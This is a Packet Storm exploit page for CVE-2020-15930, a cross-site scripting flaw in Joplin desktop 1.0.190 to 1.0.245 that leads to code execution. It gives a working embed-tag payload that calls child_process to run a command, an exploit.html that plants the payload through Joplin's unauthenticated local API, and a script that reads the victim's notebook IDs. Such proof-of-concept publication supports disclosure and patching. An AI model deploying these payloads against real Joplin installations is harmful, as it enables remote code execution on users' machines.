what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joplin 1.0.245 Cross Site Scripting / Code Execution

Joplin 1.0.245 Cross Site Scripting / Code Execution
Posted Sep 28, 2020
Authored by Ademar Nowasky Junior

Joplin version 1.0.245 suffers from a cross site scripting vulnerability that can lead to allowing for remote code execution.

tags | exploit, remote, code execution, xss
advisories | CVE-2020-15930
SHA-256 | 31ca9b8599ce9c83932797054a4edb9d935327170c17b0b17e8f585827a0591e

Joplin 1.0.245 Cross Site Scripting / Code Execution

Change Mirror Download
# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
# Version: 1.0.190 to 1.0.245
# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:
# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff

# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.

# 2. PoC
# Paste the following payload into a note:

<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">

# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.

<!-- exploit.html -->
<script>
x = new XMLHttpRequest;
j = {
title: "CVE-2020-15930",
body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
};
x.open("POST", "http://127.0.0.1:41184/notes");
x.send(JSON.stringify(j));
</script>

# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.

<!-- notebooks.html -->
<script>
x = new XMLHttpRequest();
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
alert(x.responseText);
}
}
x.open('GET', 'http://127.0.0.1:41184/folders');
x.send();
</script>
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close